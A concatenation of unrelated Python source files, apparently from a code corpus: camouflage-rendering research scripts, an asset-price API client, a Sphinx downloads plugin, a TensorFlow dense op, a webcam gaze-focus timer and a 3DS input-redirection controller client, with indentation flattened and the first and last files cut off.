#pattern = pattern.transpose([1, 0, 2])
ys, xs = np.nonzero(mask)
rect = ut.bbox2d(zip(xs, ys))
s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])
pattern = ig.resize(pattern, s)
cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern
_, texel_colors = camo.project_texels(scan, proj_frame, mesh, im, geom)
texel_colors = texel_colors * np.array(lighting_colors, 'd')/255.
table = []
# table.append(mesh_render(scan, view_frame, texel_colors, im = 255+np.zeros_like(im)))
# table.append(mesh_render(scan, proj_frame, texel_colors, im = 255+np.zeros_like(im)))
table.append(mesh_render(scan, view_frame, texel_colors))
table.append(mesh_render(scan, proj_frame, texel_colors))
ig.show(table)
if 'tour-cues' in todo:
#ntour = 5
ntour = 40
do_tours = False
#scan_tour = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)
scan_tour = dset.Scan(ut.pjoin('../data/', scene))
frames = [6, 2]
valid, proj_colors = camo.project_texels(scan_tour, frames[0], mesh, scan_tour.im(frames[0]), geom)
texel_colors = 0.75*lighting_colors.copy()
texel_colors[valid] = proj_colors[valid]
print 'distortion and occlusion boundary cues'
if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,
mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)
table = []
# all
table.append(mesh_render(scan_tour, frames[-1], texel_colors))
sc = 0.4
im_dark = sc*scan_tour.im(frames[-1])
table.append(sc*mesh_render(scan_tour, frames[-1], texel_colors))
ig.show(table)
table.append(mesh_render(scan_tour, frames[-1], texel_colors, im = im_dark))
# distortion and occlusion
#for f in [0, 6]:#xrange(6):
for f in xrange(6):#xrange(6):
tc = texel_colors.copy()
tc[mesh.tex2juv[:, 0] != f] *= sc
table.append([f, mesh_render(scan_tour, frames[-1], tc, im = im_dark)])
ig.show(table)
print "what happens if we look at a view that wasn't covered?"
frames2 = [2, 0]
ig.show(mesh_render(scan_tour, frames[-1], tc, im = im_dark))
if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames2, n = ntour, plane_idx = 3, im_wait = 1, par = par, mesh_occ = mesh_occ)
print 'we can fill it with something...'
other_frame = 1
valid2, proj_colors2 = camo.project_texels(scan_tour, other_frame, mesh, scan_tour.im(other_frame), geom)
texel_colors_filled = texel_colors.copy()
texel_colors_filled[(-valid) & valid2] = proj_colors2[-valid & valid2]
im_dark = sc*scan_tour.im(frames2[-1])
ig.show([mesh_render(scan_tour, frames2[-1], texel_colors_filled),
mesh_render(scan_tour, frames2[-1], texel_colors_filled, im = im_dark)])
ig.show([mesh_render(scan_tour, f, texel_colors_filled) for f in scan.frames])
#if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, par = par)
if 'test-mask' in todo:
table = []
#scan = scan_fr = scan_fullres(True, scan.path)
for frame in scan.frames:
fname = '../results/bookshelf-masks/im%d-colored.png' % (frame+1)
if os.path.exists(fname):
mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)
mask = 255*np.array(mask, 'd')
mask = ig.resize(mask, scan.scale, hires = 1)/255.
#mask = np.array(ig.resize(np.array(mask, 'd'), scan.scale, order = 1, hires = 0))
#ig.show(mask)
im = box.draw_faces(mesh, scan, frame)
if 0:
im[mask] = scan.im(frame)[mask]
if 1:
im = im*(1.-mask[:,:,np.newaxis]) + mask[:,:,np.newaxis]*scan.im(frame)
table.append(im)
ig.show(table)
if 'mask' in todo:
scan_fr = scan_fullres(True, scan.path)
ig.show([[scan_fr.im(f), box.draw_faces(mesh, scan_fr, f)] for f in scan_fr.frames])
if 'zebra' in todo:
table = []
# for frame1 in scan.frames:
# for other_frame in scan.frames: #[scan.length-1]:
for frame1 in [6]:
for other_frame in [4]: #[scan.length-1]:
im = scan.im(other_frame).copy()
mask = box.mask(scan, mesh, other_frame)
pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')
pattern = pattern.transpose([1, 0, 2])
ys, xs = np.nonzero(mask)
#cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
rect = ut.bbox2d(zip(xs, ys))
s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])
print s
pattern = ig.resize(pattern, s)
#ig.sub_img(im, rect)[:] = pattern
cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern
_, texel_colors = camo.project_texels(scan, other_frame, mesh, im, geom)
texel_colors = texel_colors * np.array(lighting_colors, 'd')/255.
table.append([frame1, other_frame, mesh_render(scan, frame1, texel_colors), mesh_render(scan, frame1, lighting_colors), scan.im_with_real(frame1)])
ig.show(table)
def make_octopus_video():
vids_in = ['../results/Ovulg_Wow_sequence_Silent_RTHWatermark.mov', '../results/Octopus Vulgaris.mov']
#clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mov']
clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mp4']
times = ['-ss 00:00:00 -t 10', '-ss 00:05:48 -t 12.5']
# for vid, clip, time in zip(vids_in, clips, times):
# os.system('ffmpeg -i "%s" %s "%s"' % (vid, time, clip))
ut.write_lines('../results/ffmpeg-octopus-list', ['file %s' % s for s in clips])
os.system('ffmpeg -f concat -i ../results/ffmpeg-octopus-list -c copy ../results/octopus-talk.mp4')
print 'scp', '[email protected]:' + os.path.abspath('../results/octopus-talk.mp4'), '~/Dropbox/cvpr-talk/octopus-talk.mp4'
def spotlight_slides(par = 1):
scene = 'charlottesville-3'
alg = 'occlusion-wide'
scan = dset.Scan(ut.pjoin('../data/', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
#texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
#lighting_colors = ut.load('../results/bookshelf-lighting.pk')
frame = 0
lf = 4
d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))
pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d
im = scan.im(lf)
#VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]
texel_colors = np.zeros((mesh.ntexels, 3))
for face in xrange(6):
print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))
texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),
ut.normalized(mesh.face_planes[face][:3])))
texel_colors *= 255/float(np.max(texel_colors))
lighting_colors = texel_colors
im = mesh.render(scan, frame, lighting_colors)
#ig.show(ig.resize(im, 0.5))
texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
im_colored = mesh.render(scan, frame, texel_colors)
ig.show([im, im_colored])
plane_idx = 0
url = tour.tour(scan, mesh, texel_colors, range(scan.length), plane_idx = plane_idx, par = par, start_scale = 0)
ig.show(url)
def make_occ_examples(texel_colors=None):
ut.seed_rng(0)
scene = 'walden-brush2'
if 0:
#alg = 'greedy'
#texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
#render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True)
scan_fr = dset.Scan(ut.pjoin('../data', scene), max_dim = None)
mesh = box.load_from_mat(ut.pjoin(scan_fr.path, 'cube.mat'), 512)
if texel_colors is not None:
try:
texel_colors = camo.camo(scan_fr, mesh, ut.Struct(method = 'greedy'))[0]
except:
print 'exception'
ut.toplevel_locals()
if 1:
scan = dset.Scan(ut.pjoin('../data', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
table = []
view_frame = 2
for frame in scan.frames:
try:
texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]
table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = False, frame_using_cube = True)])
except:
print 'exception'
ig.show(table)
return
frame = 2
im_bg = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, show_cube = False)
ig.show(im_bg)
im_nooutline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)
im_outline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)
ig.show([im_bg, im_nooutline, im_outline])
def make_occlusion_slide():
#scan = dset.Scan('../data/disrupt-14')
#scan = dset.Scan('../data/walden-tree1')
scan = dset.Scan('../data/mit-13', max_dim = None)
#mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), 1024)
# table = []
# for frame in scan.frames:
# view_frame = frame
# texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]
# table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = True, frame_using_cube = True)])
# ig.show(table)
#texel = mesh.juv2tex[2, 128, 128]
#texel = mesh.juv2tex[2, 0, 128]
#texel = mesh.juv2tex[2, 0, 128]
texel = mesh.juv2tex[5, 0, 128]
geom = camo.Geom(scan, mesh)
table = []
for frame in [0, 2, 4, 6]:#scan.frames:#[0, 1, 4]:
#table.append(scan.im(frame))
proj = scan.project(frame, mesh.texel_pts[texel])
if 1:
im_grid = draw_grid(scan.im(frame), proj, spacing = [0])
else:
im_grid = scan.im(frame)
label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom)
#im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)
im_nooutline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)
im_outline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)
#im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)
table.append([str(frame), im_outline, im_nooutline])
#table.append([str(frame), im, scan.im(frame)])
#table.append(ig.draw_pts(im, proj))
ig.show(table)
def make_capture_slide():
scene = 'mit-37'
scan = dset.Scan(ut.pjoin('../data', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
if 'lighting':
lf = 13
d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))
pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d
#im = scan.im(lf)
#VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]
texel_colors = np.zeros((mesh.ntexels, 3))
for face in xrange(6):
print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))
texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),
ut.normalized(mesh.face_planes[face][:3])))
texel_colors *= 255/float(np.max(texel_colors))
lighting_colors = texel_colors
# geom = camo.Geom(scan, mesh)
# #texel = mesh.juv2tex[5, 128, 128]
# texel = mesh.juv2tex[2, 128, 128]
frames = [8, 10, 13, 15]
#ig.show([[mesh.render(scan, frame, lighting_colors), scan.im(frame)] for frame in frames])
f1 = 10
f2 = 14
#f2 = 8
geom = camo.Geom(scan, mesh)
label_valid, tc1 = camo.project_texels(scan, f1, mesh, scan.im(f1), geom)
label_valid, tc2 = camo.project_texels(scan, f2, mesh, scan.im(f2), geom)
tc = tc1.copy()
#ok = label_valid & (mesh.tex2juv[:, 0] == 2) & (mesh.tex2juv[:, 1] > 128)
ok = (mesh.tex2juv[:, 0] == 1) | (mesh.tex2juv[:, 0] == 5) | (mesh.tex2juv[:, 0] == 3)
ok = (mesh.tex2juv[:, 1] > 128)
tc[ok] = tc2[ok]
#ig.show(mesh.render(scan, f1, tc))
vf = f1
c1 = render_cube(scan.path, mesh, tc1, vf, 200, outline = True, frame_using_cube = True)
c2 = render_cube(scan.path, mesh, tc2, vf, 200, outline = True, frame_using_cube = True)
ch = render_cube(scan.path, mesh, tc, vf, 200, outline = True, frame_using_cube = True)
ig.show([c1, c2, ch])
return
# c1 = mesh.render(scan, vf, tc1)
# c2 = mesh.render(scan, vf, tc2)
c1 = c2 = ''
ch = mesh.render(scan, vf, tc)
ig.show([c1, c2, ch])
# def make_camo_game():
# tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,
# mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)
|
py | 1a3043e75b75a97f65b6d42f53184043eeeaec1b | import urllib3.request
import json
import datetime as dt
from urllib3 import exceptions as urlex
from Game.periodictasks.search_alarms import AlarmSearch
import pandas as pn
import numpy as np
DATE_FORMAT = '%Y-%m-%d'
def str_to_date(strdate):
"""
parses given string to date using global date format
:param strdate:
:return date:
"""
return dt.datetime.strptime(strdate, DATE_FORMAT)
class AssetComunication:
GET_ASSETS = "getAvailableAssets/"
GET_QUOTE = "getAssetMarketPrice/"
GET_HISTORY = "getAssetHistory/"
def __init__(self, url):
self.API_URL = url
self.alarm_search = AlarmSearch(acom=self)
@staticmethod
def has_quote(asset):
"""
check if an asset has a valid quote
:param asset:
:return boolean:
"""
return asset.buy != -1 and asset.sell != -1
@staticmethod
def url_to_json(url):
"""
fetch json data from given url
:param url:
:return json_response if success, 0 otherwise:
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http = urllib3.PoolManager()
try:
res = http.request('GET', url)
if res.status == 200:
return json.loads(res.data.decode())
else:
return 0
except urlex.MaxRetryError:
return 0
def get_asset_names(self):
"""
fetch from API all the available assets (only names)
:return asset list:
"""
from Game.models import Asset
url = self.API_URL + self.GET_ASSETS
json_assets = self.url_to_json(url)
asset_list = []
try:
if json_assets != 0:
json_assets = json_assets['availableAssets']
for a in json_assets:
asset = Asset(name=a['name'], type=a['type'])
asset_list.append(asset)
return asset_list
except KeyError:
# rollback
asset_list = []
finally:
return asset_list
def get_asset_quote(self, asset):
"""
        given an asset (only the name is required), returns the same asset with
        buy and sell prices if both exist.
        also searches for alarms for the given asset.
:param asset:
:return asset:
"""
url = self.API_URL + self.GET_QUOTE + asset.name
asset_quote = self.url_to_json(url)
try:
if asset_quote != 0:
asset.buy = asset_quote['buy']
asset.sell = asset_quote['sell']
except KeyError:
# rollback
asset.buy = -1
asset.sell = -1
finally:
self.alarm_search.search_for_alarms(asset=asset)
return asset
def get_asset_type(self, name):
assets = self.get_asset_names()
for a in assets:
if name == a.name:
return a.type
return None
def quote_for_assets(self, assets):
"""
        maps an asset list (only names are required) to the same assets with
        quotes, dropping any asset that has no valid quote
:param assets:
:return asset list:
"""
        # fetch each quote only once; calling get_asset_quote twice per asset
        # would double the API requests and the alarm searches
        quoted = [self.get_asset_quote(a) for a in assets]
        return [a for a in quoted if self.has_quote(a)]
def get_assets(self):
"""
fetches all the available assets with their respective quotes
:return asset list:
"""
assets = self.get_asset_names()
return self.quote_for_assets(assets)
def get_asset_history(self, name, start_date, end_date):
"""
get all history for given asset
:param name:
:param start_date:
:param end_date:
:return dict [{day: DayString, sell: SELL_PRICE, buy: BUY_PRICE}]:
"""
url = (self.API_URL + self.GET_HISTORY + name + "/" +
start_date + "/" + end_date)
prices = self.url_to_json(url)
if prices == 0:
prices = {'error': True}
return prices
def average_for_asset(self, asset):
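        """
        attach 25/50/75 percentile buy and sell prices from the last two years
        of history to the given asset
        :param asset:
        :return asset, or None if the history lookup fails:
        """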
start_date = dt.date.today() - dt.timedelta(days=365 * 2)
end_date = dt.date.today()
        history = self.get_asset_history(
            name=asset.name,
            start_date=start_date.strftime(DATE_FORMAT),
            end_date=end_date.strftime(DATE_FORMAT))
try:
prices = history['prices']
sell = [float(p['sell']) for p in prices]
sell_df = pn.DataFrame(np.array(sell))
sell_data = sell_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]
sell_data['first'] = sell_data.pop(0.25)
sell_data['avg'] = sell_data.pop(0.5)
sell_data['third'] = sell_data.pop(0.75)
buy = [float(p['buy']) for p in prices]
buy_df = pn.DataFrame(np.array(buy))
buy_data = buy_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]
buy_data['first'] = buy_data.pop(0.25)
buy_data['avg'] = buy_data.pop(0.5)
buy_data['third'] = buy_data.pop(0.75)
asset.prices_quantiles = {
'buy': buy_data,
'sell': sell_data,
}
return asset
except KeyError:
return
def get_assets_with_average(self):
"""
        fetches all the available assets with their respective quotes and
        price quantiles
:return asset list:
"""
assets = self.get_assets()
        averaged = [self.average_for_asset(a) for a in assets if a]
        return [a for a in averaged if a]
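# Hedged usage sketch (the URL is illustrative; assumes the backing API exposes the
# endpoints above and that the Django app providing Game.models and AlarmSearch is
# configured):
#
#   comm = AssetComunication("https://market-api.example.com/")
#   for asset in comm.get_assets_with_average():
#       print(asset.name, asset.buy, asset.sell, asset.prices_quantiles)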
|
py | 1a30459009d2c7a0caf216fdf23ac44213b2089e | """
Sphinx is hardcoded to interpret links to downloadable files relative to the root of the docs
source tree. However, the downloadable files we want to use (tarballs of our examples directories)
are themselves generated at build time, and we would therefore like them to be separate from the
source. This module is a Sphinx plugin that replaces the normal interpretation of links, causing
Sphinx to look for downloads relative to a different directory (which is set in `conf.py`).
"""
import logging
import os
import types
from typing import Any, Dict
from docutils import nodes
from sphinx import addnodes, application
from sphinx.environment.collectors import asset
from sphinx.locale import __
logger = logging.getLogger(__name__)
class DownloadExternalFileCollector(asset.DownloadFileCollector):
def process_doc(
self: asset.DownloadFileCollector, app: application.Sphinx, doctree: nodes.document
) -> None:
"""
This function is different from the original method only in doing some surgery on the paths
it finds when a separate root directory is configured.
"""
for node in doctree.traverse(addnodes.download_reference):
targetname = node["reftarget"]
if "://" in targetname:
node["refuri"] = targetname
else:
rel_filename, filename = app.env.relfn2path(targetname, app.env.docname)
if app.config.dai_downloads_root:
filename = os.path.abspath(
os.path.join(app.config.dai_downloads_root, rel_filename)
)
rel_filename = os.path.relpath(filename, app.env.srcdir)
app.env.dependencies[app.env.docname].add(rel_filename)
if not os.access(filename, os.R_OK):
logger.warning(__("download file not readable: %s") % filename)
continue
node["filename"] = app.env.dlfiles.add_file(app.env.docname, rel_filename)
def setup(app: application.Sphinx) -> Dict[str, Any]:
app.add_config_value("dai_downloads_root", None, "html")
# Disable the old instance of DownloadFileCollector and replace it with ours.
for event in app.events.listeners.values():
for listener_id, callback in list(event.items()):
if isinstance(callback, types.MethodType) and isinstance(
callback.__self__, asset.DownloadFileCollector
):
del event[listener_id]
app.add_env_collector(DownloadExternalFileCollector)
return {
"version": "0",
"parallel_read_safe": True,
"parallel_write_safe": True,
}
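# Hedged configuration sketch for conf.py; the extension name and the path below
# are assumptions, not values mandated by this module:
#
#   import os
#   extensions = ["downloads"]  # assuming this module is importable as "downloads"
#   dai_downloads_root = os.path.abspath("../build/examples")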
|
py | 1a30470af116bd430d5b4d5ce4f8e73688b844ba | # Analytics Collector
def truncate(n, decimals=0):
multiplier = 10 ** decimals
return int(n * multiplier) / multiplier
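# Example: truncate(3.14159, 2) -> 3.14; values are cut rather than rounded,
# so truncate(2.999, 2) -> 2.99.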
def startCam():
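    """
    Track gaze through the webcam until 'q' is pressed.
    Returns (totalTime, percentFocused, percentDistracted).
    """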
import cv2
from gaze_tracking import GazeTracking
import time
gaze = GazeTracking()
webcam = cv2.VideoCapture(0)
startTime = time.time()
totalFrames = 0
framesDistracted = 0
framesFocused = 0
while True:
_, frame = webcam.read()
totalFrames += 1
gaze.refresh(frame)
frame = gaze.annotated_frame()
if gaze.is_blinking():
framesDistracted += 1
elif gaze.is_right():
framesDistracted += 1
elif gaze.is_left():
framesDistracted += 1
elif gaze.is_center():
framesFocused += 1
else:
framesDistracted += 1
cv2.imshow("Camera", frame)
if cv2.waitKey(1) == ord('q'):
break
webcam.release()
cv2.destroyAllWindows()
totalTime = truncate(time.time() - startTime, 2)
percentFocused = truncate((framesFocused / totalFrames) * 100, 2)
percentDistracted = truncate((framesDistracted / totalFrames) * 100, 2)
return totalTime, percentFocused, percentDistracted
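# Minimal usage sketch, assuming a working webcam and the gaze_tracking package
# are available; the report format below is illustrative only.
if __name__ == "__main__":
    totalTime, percentFocused, percentDistracted = startCam()
    print("Session: {}s | focused: {}% | distracted: {}%".format(
        totalTime, percentFocused, percentDistracted))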
|
py | 1a30472cba36d282c6f9c892d0511320fa243516 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stateless ops for core Keras layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
# TODO(b/157913406): Expose this publicly.
def dense(inputs, kernel, bias=None, activation=None, dtype=None):
"""Densely connected NN layer op.
Arguments:
inputs: `tf.Tensor` or `tf.SparseTensor`. Inputs to operation.
kernel: `tf.Variable`. Matrix kernel.
bias: (Optional) `tf.Variable`. Bias to add to outputs.
activation: (Optional) 1-argument callable. Activation function to apply to
outputs.
dtype: (Optional) `tf.DType`. Dtype to cast `inputs` to.
Returns:
`tf.Tensor`. Output of dense connection.
"""
if dtype:
if inputs.dtype.base_dtype != dtype.base_dtype:
inputs = math_ops.cast(inputs, dtype=dtype)
rank = inputs.shape.rank
if rank == 2 or rank is None:
if isinstance(inputs, sparse_tensor.SparseTensor):
outputs = sparse_ops.sparse_tensor_dense_matmul(inputs, kernel)
else:
outputs = gen_math_ops.mat_mul(inputs, kernel)
# Broadcast kernel to inputs.
else:
outputs = standard_ops.tensordot(inputs, kernel, [[rank - 1], [0]])
# Reshape the output back to the original ndim of the input.
if not context.executing_eagerly():
shape = inputs.shape.as_list()
output_shape = shape[:-1] + [kernel.shape[-1]]
outputs.set_shape(output_shape)
if bias is not None:
outputs = nn_ops.bias_add(outputs, bias)
if activation is not None:
outputs = activation(outputs)
return outputs
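# Hedged usage sketch (not part of the TensorFlow source above; shapes and names
# are illustrative only):
#
#   import tensorflow as tf
#   x = tf.ones((8, 4))
#   kernel = tf.Variable(tf.random.normal((4, 16)))
#   bias = tf.Variable(tf.zeros((16,)))
#   y = dense(x, kernel, bias=bias, activation=tf.nn.relu)  # -> shape (8, 16)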
|
py | 1a3047b1b855d6f0466d6d2bdfd5df486d535650 | #!/usr/bin/env python3
from tpp.tppflush import *
import sys
from math import fabs
try:
import pygame
except ImportError:
exit("Pygame required. Exiting.")
try:
from lib.controller import *
except ImportError:
joystick_name="??"
j_axis=[ ]
#buttons.py adds the following:
#joystick_name="Microsoft X-Box 360 pad"
#buttons=['B', 'A', 'Y', 'X', 'L', 'R', 'SELECT', 'START', 'Home', 'Home', 'Home']
#j_axis=[0, 1, 3, 4]
done=False
circx,circy = 160,120
deadZone=0.3 #send 0 when abs(axis value) is below this threshold, e.g. joystick_x=0.1 is sent as joystick_x=0.0
#Default button mapping
buttonMappings = [
HIDButtons.A,
HIDButtons.B,
HIDButtons.X,
HIDButtons.Y,
HIDButtons.SELECT, #Z
HIDButtons.R,
HIDButtons.L,
HIDButtons.START,
HIDButtons.DPADUP,
HIDButtons.DPADDOWN,
HIDButtons.DPADLEFT,
HIDButtons.DPADRIGHT
]
class KBDButtons(int):
HOME = pygame.K_HOME
POWER = pygame.K_END
#street fighter style layout on numberpad ([punches] y,x,L -> 4,5,6)
#might be useful for joy2key apps
KBbutt={
257: HIDButtons.B, #numberpad 1
258: HIDButtons.A,
259: HIDButtons.R,
260: HIDButtons.Y, #numberpad 4
261: HIDButtons.X,
262: HIDButtons.L,
256: HIDButtons.START, #numberpad 0
266: HIDButtons.SELECT, #numberpad .
273: HIDButtons.DPADUP, #arrow key up
274: HIDButtons.DPADDOWN,
276: HIDButtons.DPADLEFT,
275: HIDButtons.DPADRIGHT
}
if len(sys.argv) < 2:
#this is the pop up window
import tkinter as tk
class App:
def __init__(self, master):
frame=tk.Frame(master)
frame.pack()
#reads file lastIP to get first line
try:
f=open("lastIP","r")
last_ip=f.readline()
f.close()
except FileNotFoundError:
last_ip=" "
self.l_IP=tk.StringVar()
self.l_IP.set(last_ip)
#image banner (row 0, col 0)
lumaIMG = tk.PhotoImage(file="lib/luma.png")
lumal = tk.Label(frame,image=lumaIMG)
lumal.image = lumaIMG
lumal.grid(row=0,columnspan=3)
#places the 3 other elements (label, text box, button) on row 1
tk.Label(frame, text='IP:',font=("Courier", 22)).grid(row=1, column=0, sticky=tk.E)
tk.Entry(frame,bg='white', width=15, textvariable=self.l_IP, font=("Courier", 18)).grid(row=1,column=1, pady=10, sticky=tk.E+tk.W)
button = tk.Button(frame, text='Go', font=("Courier", 18), command=self.store)
button.grid(row=1, column=2, sticky=tk.W, pady=10)
#center label and butt
frame.grid_columnconfigure(0, weight=1)
frame.grid_columnconfigure(2, weight=1)
master.bind('<Return>', self.store ) #"enter" key
master.bind('<KP_Enter>', self.store ) # numeric "enter" key
def store(self, *args):
global IP
IP=self.l_IP.get()
f=open("lastIP","w")
f.write(IP.strip()) #stores data in text box (as string type)
f.close()
root.quit()
root= tk.Tk()
root.wm_title('3DS IP')
App(root)
root.bind('<Escape>', lambda x: quit())
root.mainloop()
root.destroy() #removes window
server = IP.strip()
else:
server = sys.argv[1]
server=LumaInputServer(server)
pygame.init()
screen = pygame.display.set_mode((320, 240))
pygame.display.set_caption('touchscreen')
botSr = pygame.image.load('lib/bottom.png')
screen.blit(botSr, (0,0))
if len(j_axis)>=6 :
pygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)
pygame.display.update()
pygame.joystick.init()
joystick_count = pygame.joystick.get_count()
print("Number of joysticks: {}".format(joystick_count) )
if (joystick_count>0):
#Only loads one joystick if multiple are connected.
for i in range(joystick_count):
joystick = pygame.joystick.Joystick(i)
name = joystick.get_name()
if name == joystick_name:
break
joystick.init()
print("Using joystick \"{}\"".format(name))
if name == joystick_name:
buttonMappings=buttons
print("\t--> loading \"{}\" layout".format(joystick_name))
else :
print("\t(using default button layout)")
print("\t{} axes, {} buttons, {} hats".format(joystick.get_numaxes(),joystick.get_numbuttons(),joystick.get_numhats()))
for i in range(joystick.get_numaxes()):
j_axis.append(i)
else:
print("No controller found!\n\t(restricted to limited keyboard button layout)")
print("\nHOME = HOME key \nPOWER = END key\nEnd Program = ESC key")
while done==False:
#Event L O O P
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
done=True
#Touchscreen input
if pygame.mouse.get_pressed()[0]:
pos = pygame.mouse.get_pos()
server.touch(pos[0], pos[1])
#print("THSC: ",pos[0],",",pos[1])
server.send()
elif event.type == pygame.MOUSEBUTTONUP:
server.clear_touch()
server.send()
#Keyboard Mappings
elif event.type == pygame.KEYDOWN:
if event.key == KBDButtons.HOME: #home
server.special_press(Special_Buttons.HOME)
#print("HOME")
if event.key == KBDButtons.POWER: #power
server.special_press(Special_Buttons.POWER)
#print("POWER")
if event.key == pygame.K_ESCAPE: #end program
server.clear_everything()
done = True
if event.key in KBbutt:
server.hid_press(KBbutt[event.key])
#print(event.key)
server.send()
elif event.type == pygame.KEYUP:
if event.key == KBDButtons.HOME: #home
server.special_unpress(Special_Buttons.HOME)
if event.key == KBDButtons.POWER: #power
server.special_unpress(Special_Buttons.POWER)
if event.key in KBbutt:
server.hid_unpress(KBbutt[event.key])
server.send()
# Possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION
if event.type == pygame.JOYBUTTONDOWN :
#print("Joystick {} button {} pressed.".format(event.joy,event.button))
server.press(buttonMappings[event.button])
server.send()
if event.type == pygame.JOYBUTTONUP:
#print("Joystick {} button {} released.".format(event.joy,event.button))
server.unpress(buttonMappings[event.button])
server.send()
if event.type == pygame.JOYHATMOTION:
#print("Joystick {} HATS moved to {}.".format(event.joy, event.value))
(xhat, yhat) = event.value #[-1,0,1]
if (xhat == 1):
server.press(HIDButtons.DPADRIGHT)
elif (xhat == -1):
server.press(HIDButtons.DPADLEFT)
elif (xhat == 0) :
server.unpress(HIDButtons.DPADRIGHT)
server.send()
server.unpress(HIDButtons.DPADLEFT)
if (yhat == 1):
server.press(HIDButtons.DPADUP)
elif (yhat == -1):
server.press(HIDButtons.DPADDOWN)
elif (yhat == 0) :
server.unpress(HIDButtons.DPADDOWN)
server.send()
server.unpress(HIDButtons.DPADUP)
server.send()
if event.type == pygame.JOYAXISMOTION:
#xbox:Left Thumbstick | axis 0 : L/R | axis 1 : U/D
#xbox: axis 2 : L trigger (-1:1)
#xbox: Right Thumbstick | axis 3 : L/R | axis 4 : U/D
#xbox: axis 5 : R trigger (-1:1)
#if event.axis == 0: print("Joystick {} axis {} moved to {}.".format(event.joy,event.axis, event.value))
